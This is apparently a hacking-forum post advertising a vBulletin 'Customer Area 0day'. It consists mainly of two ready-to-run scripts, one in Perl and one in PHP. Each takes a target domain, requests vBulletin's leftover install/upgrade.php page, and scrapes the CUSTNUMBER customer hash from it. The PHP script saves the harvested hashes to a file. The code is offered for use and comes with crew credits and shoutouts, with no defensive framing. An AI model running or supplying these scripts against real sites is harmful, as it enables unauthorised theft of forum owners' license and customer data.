vBulletin x.x.x Customer Area 0day
-------------------------------------------------
vBulletin x.x.x Customer Area 0day
Perl script got leaked so decided to post the perl script here
Code:
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
system('cls');
system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";
if($#ARGV == -1 or $#ARGV > 0)
{
print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}
$domain = $ARGV[0];
$install_dir = "install";
$full_domain = "http://$domain/$install_dir/upgrade.php";
chop($domain);
&search;
sub search
{
$url = $full_domain;
$lwp = LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
$request = $lwp->post($url, ["searchHash" => "Search"]);
print " Searching $domain ----\n ";
if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "Result : $1\n";
} else {
print "Hash: Hash not found!\n";
}
}
php exploit -
--------------------
<?php
set_time_limit(0);
if($argc < 2) {
echo "Usage: {$argv[0]} http://site.ru/forum" . PHP_EOL;
exit;
}
$URL = $argv[1];
$arr = parse_url($URL);
### work with url
if(strpos($URL, '?')) die("Ohh, your URL is not valid");
if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
if(!$arr['scheme']) $URL = 'http://' . $URL;
$headers = get_headers($URL . '/install/upgrade.php');
if(substr($headers[0], 9, 3) == '200') {
$source = file_get_contents($URL . "/install/upgrade.php");
}
elseif($headers = get_headers($URL . '/install/finalupgrage.php')) {
if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php");
}
else die("something went wrong...");
preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
echo "Hash: " . $hash . PHP_EOL;
$fp = fopen("hash.txt", "a+");
fwrite($fp, $hash . PHP_EOL);
}
?>